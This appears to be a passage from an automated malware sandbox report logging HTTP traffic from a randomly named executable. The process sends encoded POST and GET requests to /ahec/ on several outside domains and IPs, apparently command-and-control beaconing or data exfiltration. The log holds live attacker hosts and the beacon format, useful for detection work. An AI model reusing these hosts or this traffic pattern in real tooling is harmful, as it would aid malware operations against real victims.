                                                                        Data Ascii: Ot=ORDmYl44AESwkF+B3ybxO1+wUHNIHFFgCR1isUVEz41lMihcDocaejvvBMKLAgFdCgjcOg4XUOuUGf633XpWbMziV7LUKgkDPAbMt8kJYGOis7ita4x2mzY9ynXEjpO0/9MwHtsv/vada6LQAWibwjodCeC8u61CebGyTbKIcX4G2ktjkQ==
                                                                        Dec 2, 2023 18:50:36.837861061 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:36 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                        Dec 2, 2023 18:50:36.837913990 CET | 1340 | IN
                                                                        Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                        Dec 2, 2023 18:50:36.837939024 CET | 1340 | IN
                                                                        Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                        Dec 2, 2023 18:50:36.837966919 CET | 1340 | IN
                                                                        Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
                                                                        Dec 2, 2023 18:50:36.838129997 CET333INData Raw: 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20 20 20 20 20 3c 66 65 6d 65 72 67 65 3e 0a 20
                                                                        Data Ascii: s="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs></svg><h2>P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.10 | 49734 | 66.29.155.54 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:50:39.244920969 CET | 806 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.nesmalt.info
                                                                        Origin: http://www.nesmalt.info
                                                                        Referer: http://www.nesmalt.info/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=ORDmYl44AESw2UOB0RzxG1+zYnNINlFkCRpisVQfzKRlNDRcCtoadjvvKsKXdwFGCgehOhUXUO6UGdS32mpRaczgebLSEAkDPAbMt8heYCqiwaStIpx54DY+7HXEnpP9/9MSHvIF/qGda/3QBDWEpzobN+DXuJELT7eyQbS7NRQRzxBwjhwnrg8eKd8yBacx4Xbu3SE=
Dec 2, 2023 18:50:39.526721954 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:39 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.10 | 49735 | 66.29.155.54 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:50:41.947314978 CET | 1819 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.nesmalt.info
                                                                        Origin: http://www.nesmalt.info
                                                                        Referer: http://www.nesmalt.info/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 2, 2023 18:50:42.226286888 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:42 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.10 | 49736 | 66.29.155.54 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:50:44.642169952 CET | 510 | OUT | GET /ahec/?Ot=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRudeX+UPGmLlgOAA==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.nesmalt.info
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 2, 2023 18:50:44.924726009 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:50:44 GMT
                                                                        Server: Apache
                                                                        Content-Length: 5278
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
                                                                        Dec 2, 2023 18:50:44.924746990 CET | 1340 | IN
                                                                        Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                                        Dec 2, 2023 18:50:44.924758911 CET | 1340 | IN
                                                                        Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                                        Dec 2, 2023 18:50:44.924772024 CET | 1340 | IN
                                                                        Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                                        Dec 2, 2023 18:50:44.924784899 CET | 348 | IN
                                                                        Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        25 | 192.168.2.10 | 49737 | 34.149.198.43 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:51.165658951 CET | 783 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.611erhm.top
                                                                        Origin: http://www.611erhm.top
                                                                        Referer: http://www.611erhm.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=Za8RRTmDzEAZd+LBr6RWlszeBnb5qgv83Kw6y1Fkx4VlxY96pd4jErIOinTlc3bXuSanBHjjEX/J5CLj2suYLq/0Buf0WvG5KlWIcV3kvFNY2rP9MO+u0MFiXhMwAiiCOwaQmWxr9Zi95hf5z6WxhpnD3kRl1NdUvka+uRtyObEDz2zLKw==
                                                                        Dec 2, 2023 18:50:51.452313900 CET | 230 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:51 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:51.455029964 CET | 211 | IN
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        26 | 192.168.2.10 | 49738 | 34.149.198.43 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:53.795634985 CET | 803 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.611erhm.top
                                                                        Origin: http://www.611erhm.top
                                                                        Referer: http://www.611erhm.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKBlw4N6oZUjHrIOoHShEXabuSeZBHvjEXrJ5H3j2/WbL6/2dufyYPG5KlWIcVjKvEpY1YH9Ov/45sFhHRMwWSiGOwbgmV0O9ba95gv5iPq2qpnF70QT0NsYiXefiyNScL1ryjfYNB3IYcVRBVYIwsb01TLnhcI=
                                                                        Dec 2, 2023 18:50:54.082504034 CET | 230 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:53 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:54.085484982 CET | 211 | IN
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.2.10 | 49739 | 34.149.198.43 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:56.421829939 CET | 1816 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.611erhm.top
                                                                        Origin: http://www.611erhm.top
                                                                        Referer: http://www.611erhm.top/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:56.708125114 CET | 230 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:56.711246014 CET | 211 | IN
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.2.10 | 49740 | 34.149.198.43 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:50:59.045965910 CET | 509 | OUT | GET /ahec/?Ot=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJnHNv+xYZWaEw==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.611erhm.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:50:59.332140923 CET | 354 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:50:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 5208
                                                                        Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                        Vary: Accept-Encoding
                                                                        ETag: "65267254-1458"
                                                                        Cache-Control: no-cache
                                                                        Accept-Ranges: bytes
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Dec 2, 2023 18:50:59.345099926 CET | 1340 | IN
                                                                        Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                        Dec 2, 2023 18:50:59.345117092 CET | 1340 | IN
                                                                        Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                        Dec 2, 2023 18:50:59.345129967 CET | 1340 | IN
                                                                        Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
                                                                        Dec 2, 2023 18:50:59.345143080 CET | 1340 | IN
                                                                        Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
                                                                        Dec 2, 2023 18:50:59.345155001 CET | 118 | IN
                                                                        Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        29 | 192.168.2.10 | 49741 | 81.169.145.70 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:04.850024939 CET | 792 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.fam-scharf.net
                                                                        Origin: http://www.fam-scharf.net
                                                                        Referer: http://www.fam-scharf.net/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=kF7Vn6OF0YXrUbbY9r1FXeH/Z7Mdx+3UaHQ7mi15oTak04I0otecBRSsuaLbRoThvTljS6HZYyDJTG5y7XRtFWVCSIe0EoJvbyDQj5LkP5Lrt6WBqDAZrwGzdauyrX77JMH0JNKUPMI7Z0mboh4VsE+w35Mi44lT5tLgae3t0XLzMuplNw==
                                                                        Dec 2, 2023 18:51:05.052381992 CET | 428 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:04 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        30 | 192.168.2.10 | 49742 | 81.169.145.70 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:08.962429047 CET | 812 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.fam-scharf.net
                                                                        Origin: http://www.fam-scharf.net
                                                                        Referer: http://www.fam-scharf.net/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5PrhOk0Z40poycGRSsg6LaPYT/vTprS67ZYynJTExyu2RqEGVAHYe2KIJvbyDQj5eBP5TrtuqBqiAa3gG8aauy4H7/JMGbJMm+POg7Z2ObpzQWlE+2z5N33q5eif3cKML+ljjnAbF2KFRbtcKWtOTSAPfshSvpstM=
                                                                        Dec 2, 2023 18:51:09.168382883 CET | 428 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:09 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        31 | 192.168.2.10 | 49743 | 81.169.145.70 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:51:11.698075056 CET | 1825 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.fam-scharf.net
                                                                        Origin: http://www.fam-scharf.net
                                                                        Referer: http://www.fam-scharf.net/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:11.903847933 CET | 428 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:11 GMT
                                                                        Server: Apache/2.4.58 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        32 | 192.168.2.10 | 49744 | 81.169.145.70 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
